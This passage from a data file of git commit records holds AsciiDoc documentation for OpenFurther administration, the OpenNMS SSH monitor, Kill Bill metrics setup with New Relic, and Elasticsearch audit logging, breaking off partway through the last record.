FQL is largely based on Hibernate Criteria objects, it's possible to convert an FQL query into Hibernate Criteria that will then allow Hibernate to convert that into SQL.\n\nConverting an FQL is very simple.\n\n1. Using JAXB, unmarshal the XML into a SearchQueryTo.\n2. Locate the root hibernate entity class (typically Person or Patient) <Root Entity>\n3. Call the QueryBuilder class like below\n\n.Converting FQL to Hibernate Criteria\n[source,java,numbered]\n----\nfinal GenericCriteria hibernateCriteria = \n\tQueryBuilderHibernateImpl.convert(CriteriaType.CRITERIA, <Root \n\t\tEntity>.class, sessionFactory, searchQuery);\n----\n\nFQL Schema\n^^^^^^^^^^\n.FQL Schema\nimage::images\/figures\/search_query_xsd.png[]\n\nTechnologies\n------------\nOpenFurther is built on a number of Open Source technologies\n\n* Languages\n** Java\n** Groovy \n** Bash\n** Python\n* Development Tools\n** Maven 3\n** SonaType Nexus\n** Eclipse\n** Git\n** JIRA\n** Bamboo\n* Service Frameworks\n** Spring\n** Apache Commons\n** Apache CXF\n** Apache Camel\n* Application Servers\n** Apache ServiceMix\n* Testing\n** JUnit\n** Spock\n\nInstalling\n----------\nOpenFurther is provided as a VM image for download at this time. The VM can be used as a reference for installation, typically splitting out each Linux user as an individual server.\n\nTODO: Expand this section with detailed instructions for installing on Linux and Windows\n\nDemo System Administration\n---------------------------\nOpenFurther utilizes a number of different servers to run. The following instructions pertain to the demo VM of OpenFurther that is available for download. All scripts used for starting and stopping services are available within the further-open-extras repository on GitHub.\n\nTIP: The demo version contains all of the servers as individual Linux users.\n\nApache HTTP Server\n~~~~~~~~~~~~~~~~~~\nThe Apache HTTP server runs on port 80 and port 443. As root, run the following\n\n----\nservice httpd start|stop\n----\n\nIn-Memory Database Server\n~~~~~~~~~~~~~~~~~~~~~~~~~\nThe HSQLDB server runs on port 9001. As root, run the following\n\n----\n\/etc\/init.d\/hsqldb start|stop\n----\n\nCore Database Server\n~~~~~~~~~~~~~~~~~~~~\nNOTE: While our architecture supports different database, we've currently only tested OpenFurther on Oracle and Oracle XE\n\n----\nservice oracle-xe start|stop\n----\n\nTerminology Server\n~~~~~~~~~~~~~~~~~~\nThe terminology server (Apelon DTS) runs on port 16666 (Requires that the Oracle Database Server has started). As root, run the following\n\n----\nsu - dtsdemo\ndts-auto start|stop\n----\n\nEnterprise Service Bus (ESB)\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nOpenFurther utilizes an ESB (Apache ServiceMix) to run application code. The ESB requires that the in-memory database, core database, and terminology server are already started. As root, run the following\n\n----\nsu - esb\nstart_esb\n----\n\nTo stop the ESB:\n\n----\nsu - esb\nesbl\nfurther@localhost\u2019s password:\nfurther@local> shutdown\nConfirm: shutdown instance local (yes\/no):\n----\n\nLogging Locations\n~~~~~~~~~~~~~~~~~\n\nApache HTTP Server\n^^^^^^^^^^^^^^^^^^\nThe Apache HTTP server logs are located in \/var\/www\/httpd\/\n\nIn-Memory Database Server\n^^^^^^^^^^^^^^^^^^^^^^^^^\nThe HSQLDB is currently not configured for logging\n\nCore Database Server\n^^^^^^^^^^^^^^^^^^^^\nThe Oracle XE database server is currently not configured for logging\n\nTerminology Server\n^^^^^^^^^^^^^^^^^^\nThe Apelon DTS server logs in \/home\/demodts\/Apelon_DTS\/dts\/bin\/logs\n\nEnterprise Service Bus (ESB)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^\nServiceMix ESB logs in \/home\/esb\/servicemix\/data\/log\n\nOpenFurther-i2b2\n^^^^^^^^^^^^^^^^\nFURTHeR-i2b2 logs in 2 different locations\n\n* jboss: \/home\/i2b2\/jboss\/server\/default\/logs\n* tomcat: \/home\/i2b2\/tomcat\/logs\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"be4675528861f8285c646492f2c57ea223906270","subject":"NMS-6687: some German Ordnungswahn","message":"NMS-6687: some German Ordnungswahn\n\nCyrille\n","repos":"roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/SshMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/SshMonitor.adoc","new_contents":"=== SshMonitor\n\nThe SSH monitor tests the availability of a SSH service. \nDuring the poll an attempt is made to connect on the specified port. If the connection request is successful, then the service is considered up.\nOptionaly, the banner line generated by the service may be parsed and compared against a pattern before the service is considered up.\n\n==== Monitor facts\n\n[options=\"autowidth\"]\n|===\n| Class Name | `org.opennms.netmgt.poller.monitors.SshMonitor`\n| Remote Enabled | true\n|===\n\n==== Configuration and Usage\n\n.Monitor specific parameters for the SshMonitor\n[options=\"header, autowidth\"]\n|===\n| Parameter | Description | Required | Default value\n| `banner` | Regular expression to be matched against the service's banner. | optional | `-`\n| `client-banner` | The client banner that OpenNMS will use to identify itself on the service. | optional | `SSH-1.99-OpenNMS_1.5`\n| `match` | Regular expression to be matched against the service's banner. +\n Deprecated, please use the `banner` parameter instead. +\n Note that this parameter takes precedence over the `banner` parameter, though. | optional | `-`\n| `port` | TCP port to which SSH connection shall be tried. | optional | `22`\n| `retry` | Number of attempts to establish the SSH connnection. | optional | `0`\n| `timeout` | Timeout in milliseconds for SSH connection establishment. | optional | `3000`\n|===\n\n==== Examples\n\n[source, xml]\n----\n<service name=\"SSH\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"retry\" value=\"1\"\/>\n <parameter key=\"banner\" value=\"SSH\"\/>\n <parameter key=\"client-banner\" value=\"OpenNMS poller\"\/>\n <parameter key=\"timeout\" value=\"5000\"\/>\n <parameter key=\"rrd-repository\" value=\"\/var\/lib\/opennms\/rrd\/response\"\/>\n <parameter key=\"rrd-base-name\" value=\"ssh\"\/>\n <parameter key=\"ds-name\" value=\"ssh\"\/>\n<\/service>\n<monitor service=\"SSH\" class-name=\"org.opennms.netmgt.poller.monitors.SshMonitor\"\/>\n----\n","old_contents":"=== SshMonitor\n\nThe SSH monitor tests the availability of a SSH service. +\nDuring the poll an attempt is made to connect on the specified port. If the connection request is successful, then the service is considered up. +\nOptionaly, the banner line generated by the service may be parsed and compared against a pattern before the service is considered up.\n\n==== Monitor facts\n\n[options=\"autowidth\"]\n|===\n| Class Name | `org.opennms.netmgt.poller.monitors.SshMonitor`\n| Remote Enabled | true\n|===\n\n==== Configuration and Usage\n\n.Monitor specific parameters for the SshMonitor\n[options=\"header, autowidth\"]\n|===\n| Parameter | Description | Required | Default value\n| `banner` | Regular expression to be matched against the service's banner. | optional | `-`\n| `client-banner` | The client banner that OpenNMS will use to identify itself on the service. | optional | `SSH-1.99-OpenNMS_1.5`\n| `match` | Regular expression to be matched against the service's banner. +\n Deprecated, please use the `banner` parameter instead. +\n Note that this parameter takes precedence over the `banner` parameter, though. | optional | `-`\n| `port` | TCP port to which SSH connection shall be tried. | optional | `22`\n| `retry` | Number of attempts to establish the SSH connnection. | optional | `0`\n| `timeout` | Timeout in milliseconds for SSH connection establishment. | optional | `3000`\n|===\n\n==== Examples\n\n[source, xml]\n----\n<service name=\"SSH\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"retry\" value=\"1\"\/>\n <parameter key=\"banner\" value=\"SSH\"\/>\n <parameter key=\"client-banner\" value=\"OpenNMS poller\"\/>\n <parameter key=\"timeout\" value=\"5000\"\/>\n <parameter key=\"rrd-repository\" value=\"\/var\/lib\/opennms\/rrd\/response\"\/>\n <parameter key=\"rrd-base-name\" value=\"ssh\"\/>\n <parameter key=\"ds-name\" value=\"ssh\"\/>\n<\/service>\n<monitor service=\"SSH\" class-name=\"org.opennms.netmgt.poller.monitors.SshMonitor\"\/>\n----\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"65529b4a46a6e0a17ad9451e03caf45f53e5a762","subject":"Beginning document for Rollbar","message":"Beginning document for Rollbar","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/metrics-rollbar.adoc","new_file":"userguide\/tutorials\/metrics-rollbar.adoc","new_contents":"= Error Tracking with RollBar\n\n:imagesdir: https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\n\n\n== Single-Tier and Multi-Tier Implementations\n\nError Tracking is an important part of managing your Kill\nBill system. When errors occur, whether due to system bugs or user mistakes, error tracking enables you to analyze what went wrong and develop ways to avoid similar errors in the future.\n\nYour application may log errors along with many other events, but log files are often huge and it is not easy to extract the information needed for error analysis. Several third-party tools are available to help with this task. One popular tool is https:\/\/rollbar.com\/[Rollbar]. This\npackage offers error extraction and analysis at very low cost for your Kill Bill implementation.\n\nRollbar can be integrated with several types of Kill Bill installations. In this guide we discuss the use of Rollbar to track errors produced\nby two types of implementations on Amazon Web Services (AWS):\nsingle-tier and multi-tier. With the latest Amazon Machine Image (AMI)\nfor Kill Bill, it is very easy to process the Kill Bill logs using\nRollbar and work with them in the way that best suits your needs.\n\n== Check Your Kill Bill Version\n\nWe assume that you have a working Kill Bill implementation running on\nAWS, using either the\nhttps:\/\/docs.killbill.io\/latest\/aws-singletier.html[Single Tier] or\nhttps:\/\/docs.killbill.io\/latest\/aws-multitier.html[Multitier]\ninstallation options. The single-tier option runs Kill Bill, Kaui, the\nMariaDB database, and the nginx load balancer on a single AWS EC2\ninstance. This is suitable for quick deployment and for testing and\ndevelopment. The multi-tier option runs Kill Bill and Kaui on two or more\nseparate EC2 instances, and uses an AWS RDS database manager along with\nan AWS load balancer. This is an attractive option for many production\nuses.\n\nYou should be running Kill Bill version 2021.9 or later. This version\ncan be configured to provide its full collection of Kill Bill metrics to\nNew Relic (and several other analysis tools). If you open the Kill Bill\nadmin page in your browser, it should show that you are\nrunning the \"Kill Bill Premium edition\":\n\nimage::metrics-kb-admin.png[align=center]\n\n\nIf you see this page you are ready to go. If not, you should upgrade\nyour installation.\n\nWhile you are on this page, if you want to see all the metrics that Kill\nBill has to offer, just add the path `\/1.0\/metrics` to the URL. Have fun!\nIf you find these hard to understand, though, maybe New Relic can help.\n\n== Set Up New Relic\n\nYou may already be familiar with New Relic. If not, this section will\nexplain how to get started.\n\nFirst, go to the https:\/\/www.newrelic.com\/[New Relic website]. New Relic\noffers a free account as long as your usage does not exceed certain limits. Provide a name and email address to sign up.\n\nYou should see the New Relic main page. To get back to this page at a future time you can click the words *New Relic One* in the upper left corner.\n\nTo set up New Relic to manage the metrics available from Kill Bill, there\nare just two steps: (1) install the New Relic agent in Kill Bill, and (2)\nedit a configuration file to enable the transfer of the complete Kill Bill metrics.\n\n== Install the Agent\n\nThe first step in integrating an analysis tool (like New Relic) and a\nsource of data to analyze (like Kill Bill) is to set up a means to get\nthe source to send its data to the analyzer. New Relic does this by\ninstalling the *New Relic Agent* in the system producing the data.\n\n1. In the main New Relic page, select the button labeled *Add Some Data*. If this button does not appear, select *+ Add More Data* in the upper right corner. \n2. An overlay pane should appear. At the top of this pane select *Guided Install*.\n3. The next pane is headed *Installation Plan*. Make sure the *Auto-Discovery* tab is selected, then choose *Linux*.\n4. The next pane summarizes what you have selected. Click on *Begin Installation*. You will see the following page:\n\nimage::metrics-newrelic-installation.png[align=center]\n\n[start=5]\n. In the box containing the install command, click *Copy Command*. The command will be copied to your clipboard.\n\n[NOTE]\nThis command includes the API key assigned to you by\nNew Relic. This authorizes the agent to do its job. This is your *user* API Key, and should not be confused with the key you will use in the next step.\n\n[start=6]\n. To install the agent: \n\n.. Login to your EC2 instance. \n.. Paste the saved install command to the Ubuntu command line. \n.. Press Enter. The installation should begin.\n\nYou will be presented with a list of options to install, as shown below. An additional option, Infrastructure Agent, is always installed.\n\n[start=7]\n. Press Enter to select all of the options.\n\nimage::metrics-newrelic-options.png[align=center]\n\n\nYou will be presented with several questions including default answers.\n\n[start=8]\n. Press Enter after each question to select the defaults.\n\nFinally, you will be asked for the MySQL password.\n\n[start=9]\n. Type `root`.\n\nIf all goes well, each installation should report `success`.\n\n\n[NOTE]\n*Note:* If you are using the multi-tier installation, you will have multiple EC2\ninstances. The agent should be installed separately for each one.\n\n== Test the Installation\n\n. Return to the New Relic main page. \n. Select *Browse Data* from the top menu. \n. Select *Metrics* from the dropdown.\n\nYou should see a\nlong list of metrics! These are coming from your instances, but they\nonly describe the Ubuntu environment itself. You do not yet have the\nKill Bill metrics. To fix this, proceed to the next section.\n\n== Set Up the Authorization\n\nTo authorize the sending of the Kill Bill metrics, it is necessary to\nedit two lines in this file:\n\n ```\n \/var\/lib\/tomcat\/bin\/setenv2.sh\n ```\n\nThis file contains configuration information for `tomcat`, which manages the\nKillBill web applications.\n\nThis is a small file. The two lines to be edited are:\n\n```\n-Dcom.killbill.newrelic.enable=false\n-Dcom.killbill.newrelic.apiKey=\n```\n\nThese should be changed to:\n\n```\n-Dcom.killbill.newrelic.enable=true\n-Dcom.killbill.newrelic.apiKey=Your-API-Key\n```\n\nThe API key to be added is called the *Insights Insert Key.* This is *not* the same as the user API Key contained in the command you\nused to install the agent.\n\nTo find the Insights Insert Key:\n\n1. Close any overlay panes on the New Relic page by clicking on the `X` in the upper right corner.\n2. Click the symbol at the far upper right to open your account menu, then select *API keys*.\n3. On the page that appears, select *Insights Insert keys* at the lower right.\n4. In the *Insert Keys* column on the left, under the word *key* at the bottom, click *Show*.\n5. Manually copy the key to your clipboard, then paste it to the configuration file.\n\nAfter editing the file, go to your AWS EC2 dashboard and *reboot the\ninstance* so the new configuration file will be read. If you have more\nthan one instance, follow the same procedure for each one.\n\nNow return to the *Metrics\/Summary* page. After a short delay, you\nshould see a lot more metrics; well over 1,000 in your list.\n\nCongratulations. Your New Relic integration is complete!\n\n== Using New Relic\n\nThe New Relic site has lots of https:\/\/docs.newrelic.com\/docs\/[documentation], so we won't\nrepeat any of that here. We will just suggest a few quick steps to get\nstarted:\n\n1. Close any overlay panes on the New Relic page by clicking on the `X` in the upper right corner.\n2. Select *Browse Data* in the menu and *Metrics* in the submenu. A list of available metrics will appear on the left.\n3. Select some metrics to see the graph (chart) they produce. Identify the ones you would like to see together in a dashboard.\n4. To create a dashboard, close the metrics page, select *Dashboards* in the menu, and click *+ Create a Dashboard*.\n5. Select *Create New Dashboard*, give it a name, and click *Create*.\n\nYou can add charts to your dashboard for any metrics you choose. The charts can be edited, deleted, and rearranged. Your dashboard will appear under the *Dashboards* menu item. Have fun and good luck!\n\n\n\n\n","old_contents":"= Managing Metrics with New Relic\n\n:imagesdir: https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\n\n\n== Single-Tier and Multi-Tier Implementations\n\nMeasurements and metrics are an important part of managing your Kill\nBill system to be sure that performance is optimized and any problems\ncan be detected early. Kill Bill collects over 1,300 metrics to show you\nevery conceivable view of your system's behavior.\n\nSeveral third-party tools are available to manage and display metrics of\nthis type. One popular tool is https:\/\/www.newrelic.com\/[New Relic]. This\npackage offers a low-cost option to monitor and display whatever metrics\nyou may find useful from the Kill Bill collection, including metrics\nthat show the performance and resource use of Kill Bill and Kaui\nthemselves, and metrics describing the infrastructure on which these\nsystems run.\n\nNew Relic can be integrated with several types of Kill Bill installations. In this guide we discuss the use of New Relic to manage metrics produced\nby two types of implementations on Amazon Web Services (AWS):\nsingle-tier and multi-tier. With the latest Amazon Machine Image (AMI)\nfor Kill Bill, it is very easy to direct the Kill Bill metrics to\nNew Relic and work with them in the way that best suits your needs.\n\n== Check Your Kill Bill Version\n\nWe assume that you have a working Kill Bill implementation running on\nAWS, using either the\nhttps:\/\/docs.killbill.io\/latest\/aws-singletier.html[Single Tier] or\nhttps:\/\/docs.killbill.io\/latest\/aws-multitier.html[Multitier]\ninstallation options. The single-tier option runs Kill Bill, Kaui, the\nMariaDB database, and the nginx load balancer on a single AWS EC2\ninstance. This is suitable for quick deployment and for testing and\ndevelopment. The multi-tier option runs Kill Bill and Kaui on two or more\nseparate EC2 instances, and uses an AWS RDS database manager along with\nan AWS load balancer. This is an attractive option for many production\nuses.\n\nYou should be running Kill Bill version 2021.9 or later. This version\ncan be configured to provide its full collection of Kill Bill metrics to\nNew Relic (and several other analysis tools). If you open the Kill Bill\nadmin page in your browser, it should show that you are\nrunning the \"Kill Bill Premium edition\":\n\nimage::metrics-kb-admin.png[align=center]\n\n\nIf you see this page you are ready to go. If not, you should upgrade\nyour installation.\n\nWhile you are on this page, if you want to see all the metrics that Kill\nBill has to offer, just add the path `\/1.0\/metrics` to the URL. Have fun!\nIf you find these hard to understand, though, maybe New Relic can help.\n\n== Set Up New Relic\n\nYou may already be familiar with New Relic. If not, this section will\nexplain how to get started.\n\nFirst, go to the https:\/\/www.newrelic.com\/[New Relic website]. New Relic\noffers a free account as long as your usage does not exceed certain limits. Provide a name and email address to sign up.\n\nYou should see the New Relic main page. To get back to this page at a future time you can click the words *New Relic One* in the upper left corner.\n\nTo set up New Relic to manage the metrics available from Kill Bill, there\nare just two steps: (1) install the New Relic agent in Kill Bill, and (2)\nedit a configuration file to enable the transfer of the complete Kill Bill metrics.\n\n== Install the Agent\n\nThe first step in integrating an analysis tool (like New Relic) and a\nsource of data to analyze (like Kill Bill) is to set up a means to get\nthe source to send its data to the analyzer. New Relic does this by\ninstalling the *New Relic Agent* in the system producing the data.\n\n1. In the main New Relic page, select the button labeled *Add Some Data*. If this button does not appear, select *+ Add More Data* in the upper right corner. \n2. An overlay pane should appear. At the top of this pane select *Guided Install*.\n3. The next pane is headed *Installation Plan*. Make sure the *Auto-Discovery* tab is selected, then choose *Linux*.\n4. The next pane summarizes what you have selected. Click on *Begin Installation*. You will see the following page:\n\nimage::metrics-newrelic-installation.png[align=center]\n\n[start=5]\n. In the box containing the install command, click *Copy Command*. The command will be copied to your clipboard.\n\n[NOTE]\nThis command includes the API key assigned to you by\nNew Relic. This authorizes the agent to do its job. This is your *user* API Key, and should not be confused with the key you will use in the next step.\n\n[start=6]\n. To install the agent: \n\n.. Login to your EC2 instance. \n.. Paste the saved install command to the Ubuntu command line. \n.. Press Enter. The installation should begin.\n\nYou will be presented with a list of options to install, as shown below. An additional option, Infrastructure Agent, is always installed.\n\n[start=7]\n. Press Enter to select all of the options.\n\nimage::metrics-newrelic-options.png[align=center]\n\n\nYou will be presented with several questions including default answers.\n\n[start=8]\n. Press Enter after each question to select the defaults.\n\nFinally, you will be asked for the MySQL password.\n\n[start=9]\n. Type `root`.\n\nIf all goes well, each installation should report `success`.\n\n\n[NOTE]\n*Note:* If you are using the multi-tier installation, you will have multiple EC2\ninstances. The agent should be installed separately for each one.\n\n== Test the Installation\n\n. Return to the New Relic main page. \n. Select *Browse Data* from the top menu. \n. Select *Metrics* from the dropdown.\n\nYou should see a\nlong list of metrics! These are coming from your instances, but they\nonly describe the Ubuntu environment itself. You do not yet have the\nKill Bill metrics. To fix this, proceed to the next section.\n\n== Set Up the Authorization\n\nTo authorize the sending of the Kill Bill metrics, it is necessary to\nedit two lines in this file:\n\n ```\n \/var\/lib\/tomcat\/bin\/setenv2.sh\n ```\n\nThis file contains configuration information for `tomcat`, which manages the\nKillBill web applications.\n\nThis is a small file. The two lines to be edited are:\n\n```\n-Dcom.killbill.newrelic.enable=false\n-Dcom.killbill.newrelic.apiKey=\n```\n\nThese should be changed to:\n\n```\n-Dcom.killbill.newrelic.enable=true\n-Dcom.killbill.newrelic.apiKey=Your-API-Key\n```\n\nThe API key to be added is called the *Insights Insert Key.* This is *not* the same as the user API Key contained in the command you\nused to install the agent.\n\nTo find the Insights Insert Key:\n\n1. Close any overlay panes on the New Relic page by clicking on the `X` in the upper right corner.\n2. Click the symbol at the far upper right to open your account menu, then select *API keys*.\n3. On the page that appears, select *Insights Insert keys* at the lower right.\n4. In the *Insert Keys* column on the left, under the word *key* at the bottom, click *Show*.\n5. Manually copy the key to your clipboard, then paste it to the configuration file.\n\nAfter editing the file, go to your AWS EC2 dashboard and *reboot the\ninstance* so the new configuration file will be read. If you have more\nthan one instance, follow the same procedure for each one.\n\nNow return to the *Metrics\/Summary* page. After a short delay, you\nshould see a lot more metrics; well over 1,000 in your list.\n\nCongratulations. Your New Relic integration is complete!\n\n== Using New Relic\n\nThe New Relic site has lots of https:\/\/docs.newrelic.com\/docs\/[documentation], so we won't\nrepeat any of that here. We will just suggest a few quick steps to get\nstarted:\n\n1. Close any overlay panes on the New Relic page by clicking on the `X` in the upper right corner.\n2. Select *Browse Data* in the menu and *Metrics* in the submenu. A list of available metrics will appear on the left.\n3. Select some metrics to see the graph (chart) they produce. Identify the ones you would like to see together in a dashboard.\n4. To create a dashboard, close the metrics page, select *Dashboards* in the menu, and click *+ Create a Dashboard*.\n5. Select *Create New Dashboard*, give it a name, and click *Create*.\n\nYou can add charts to your dashboard for any metrics you choose. The charts can be edited, deleted, and rearranged. Your dashboard will appear under the *Dashboards* menu item. Have fun and good luck!\n\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a88c050a05cc2727225497cbe2ce16f0c5a1766f","subject":"Docs be explicit on how to turn off deprecated auditing (#37316)","message":"Docs be explicit on how to turn off deprecated auditing (#37316)\n\nJust be explicit about turning off the deprecated audit log appender\r\nbecause we really want people to turn it off.","repos":"coding0011\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch","old_file":"x-pack\/docs\/en\/security\/auditing\/output-logfile.asciidoc","new_file":"x-pack\/docs\/en\/security\/auditing\/output-logfile.asciidoc","new_contents":"[role=\"xpack\"]\n[[audit-log-output]]\n=== Logfile audit output\n\nThe `logfile` audit output is the default output for auditing. It writes data to\nthe `<clustername>_audit.log` file in the logs directory. To maintain\ncompatibility with releases prior to 6.5.0, a `<clustername>_access.log` file\nis also generated. They differ in the output format but the contents\nare similar. For systems that are not ingesting the audit file for search or\nanalytics it is strongly recommended to keep only the newer format.\n\nTo turn off the deprecated output format, you can disable the logger in the\n`log4j2.properties` file: \n\n[source, properties]\n--------------------------------------------------\n# change info to off\n# logger.xpack_security_audit_deprecated_logfile.level = info\nlogger.xpack_security_audit_deprecated_logfile.level = off\n--------------------------------------------------\n\nAlternatively, use the\n{ref}\/cluster-update-settings.html[cluster update settings API] to dynamically\nconfigure the logger:\n\n[source,js]\n--------------------------------------------------\nPUT \/_cluster\/settings\n{\n \"persistent\": {\n \"logger.org.elasticsearch.xpack.security.audit.logfile.DeprecatedLoggingAuditTrail\": \"off\"\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nNOTE: If you overwrite the `log4j2.properties` and do not specify appenders for\nany of the audit trails, audit events are forwarded to the root appender, which\nby default points to the `elasticsearch.log` file.\n\n\n[float]\n[[audit-log-entry-format]]\n=== Log entry format\n\nThe log entries in the `<clustername>_audit.log` file have the following format:\n\n- Each log entry is a one line JSON document and each one is printed on a separate line.\n- The fields of a log entry are ordered. However, if a field does not have a value it\n will not be printed. The precise line pattern, together with the complete field\n order, are specified in the `log4j2.properties` config file.\n- The log entry does not contain nested inner JSON objects, i.e. the doc is flat.\n- The field names follow a dotted notation to flatten inner objects.\n- A field's value can be a string, a number or an array of strings.\n- A field's value, a request body as well, will be escaped as per the JSON RFC 4627.\n\nThere is a list of <<audit-event-types, audit event types>> specifying the\nset of fields for each sog entry type.\n\n[float]\n[[deprecated-audit-log-entry-format]]\n=== Deprecated log entry format\n\nThe log entries in the `<clustername>_access.log` file have the following format:\n\n[source,txt]\n----------------------------------------------------------------------------\n[<timestamp>] [<local_node_info>] [<layer>] [<entry_type>] <attribute_list>\n----------------------------------------------------------------------------\n\n`<timestamp>` :: When the event occurred. You can configure the\n timestamp format in `log4j2.properties`.\n`<local_node_info>` :: Information about the local node that generated\n the log entry. You can control what node information\n is included by configuring the\n {ref}\/auditing-settings.html#node-audit-settings[local node info settings].\n`<layer>` :: The layer from which this event originated:\n `rest`, `transport` or `ip_filter`.\n`<entry_type>` :: The type of event that occurred: `anonymous_access_denied`,\n `authentication_failed`, `access_denied`, `access_granted`,\n `connection_granted`, `connection_denied`.\n`<attribute_list>` :: A comma-separated list of key-value pairs that contain\n data pertaining to the event. Formatted as\n `attr1=[val1], attr2=[val2]`. See <<audit-event-attributes,\n Audit Entry Attributes>> for the attributes that can be included\n for each type of event.\n\n[float]\n[[audit-log-settings]]\n=== Logfile output settings\n\nThe events and some other information about what gets logged can be\ncontrolled using settings in the `elasticsearch.yml` file. See\n{ref}\/auditing-settings.html#event-audit-settings[Audited Event Settings] and\n{ref}\/auditing-settings.html#node-audit-settings[Local Node Info Settings].\n\nIMPORTANT: No filtering is performed when auditing, so sensitive data may be\naudited in plain text when including the request body in audit events.\n\n[[logging-file]]\nYou can also configure how the logfile is written in the `log4j2.properties`\nfile located in `ES_PATH_CONF`. By default, audit information is appended to the\n`<clustername>_audit.log` file located in the standard Elasticsearch `logs` directory\n(typically located at `$ES_HOME\/logs`). The file rolls over on a daily basis.\nThe deprecated logfile audit format (`<clustername>_access.log`) can be disabled\nfrom the same `log4j2.properties` file (hint: look for the comment\ninstructing to set the log level to `off`). The deprecated format is a duplication\nof information that is in place to assure backwards compatibility. If you are\nnot strict about the audit format it is strongly recommended to only use the\n`<clustername>_audit.log` log appender.\n\n[float]\n[[audit-log-ignore-policy]]\n=== Logfile audit events ignore policies\n\nThe comprehensive audit trail is necessary to ensure accountability. It offers tremendous\nvalue during incident response and can even be required for demonstrating compliance.\n\nThe drawback of an audited system is represented by the inevitable performance penalty incurred.\nIn all truth, the audit trail spends _I\/O ops_ that are not available anymore for the user's queries.\nSometimes the verbosity of the audit trail may become a problem that the event type restrictions,\n<<audit-log-settings, defined by `include` and `exclude`>>, will not alleviate.\n\n*Audit events ignore policies* are a finer way to tune the verbosity of the audit trail.\nThese policies define rules that match audit events which will be _ignored_ (read as: not printed).\nRules match on the values of attributes of audit events and complement the <<audit-log-settings, include\/exclude>> method.\nImagine the corpus of audit events and the policies chopping off unwanted events.\n\nIMPORTANT: When utilizing audit events ignore policies you are acknowledging potential\naccountability gaps that could render illegitimate actions undetectable.\nPlease take time to review these policies whenever your system architecture changes.\n\nA policy is a named set of filter rules. Each filter rule applies to a single event attribute,\none of the `users`, `realms`, `roles` or `indices` attributes. The filter rule defines\na list of {ref}\/query-dsl-regexp-query.html#regexp-syntax[Lucene regexp], *any* of which has to match the value of the audit\nevent attribute for the rule to match.\nA policy matches an event if *all* the rules comprising it match the event.\nAn audit event is ignored, therefore not printed, if it matches *any* policy. All other\nnon-matching events are printed as usual.\n\nAll policies are defined under the `xpack.security.audit.logfile.events.ignore_filters`\nsettings namespace. For example, the following policy named _example1_ matches\nevents from the _kibana_ or _admin_user_ principals **and** operating over indices of the\nwildcard form _app-logs*_:\n\n[source,yaml]\n----------------------------\nxpack.security.audit.logfile.events.ignore_filters:\n example1:\n users: [\"kibana\", \"admin_user\"]\n indices: [\"app-logs*\"]\n----------------------------\n\nAn audit event generated by the _kibana_ user and operating over multiple indices\n, some of which do not match the indices wildcard, will not match.\nAs expected, operations generated by all other users (even operating only on indices that\nmatch the _indices_ filter) will not match this policy either.\n\nAudit events of different types may have <<audit-event-attributes, different attributes>>.\nIf an event does not contain an attribute for which some policy defines filters, the\nevent will not match the policy.\nFor example, the following policy named _example2_, will never match `authentication_success` or\n`authentication_failed` events, irrespective of the user's roles, because these\nevent schemas do not contain the `role` attribute:\n\n[source,yaml]\n----------------------------\nxpack.security.audit.logfile.events.ignore_filters:\n example2:\n roles: [\"admin\", \"ops_admin_*\"]\n----------------------------\n\nLikewise, any events of users with multiple roles, some of which do not match the\nregexps will not match this policy.\n\nFor completeness, although practical use cases should be sparse, a filter can match\na missing attribute of an event, using the empty string (\"\") or the empty list ([]).\nFor example, the following policy will match events that do not have the `indices`\nattribute (`anonymous_access_denied`, `authentication_success` and other types) as well\nas events over the _next_ index.\n\n[source,yaml]\n----------------------------\nxpack.security.audit.logfile.events.ignore_filters:\n example3:\n indices: [\"next\", \"\"]\n----------------------------\n","old_contents":"[role=\"xpack\"]\n[[audit-log-output]]\n=== Logfile audit 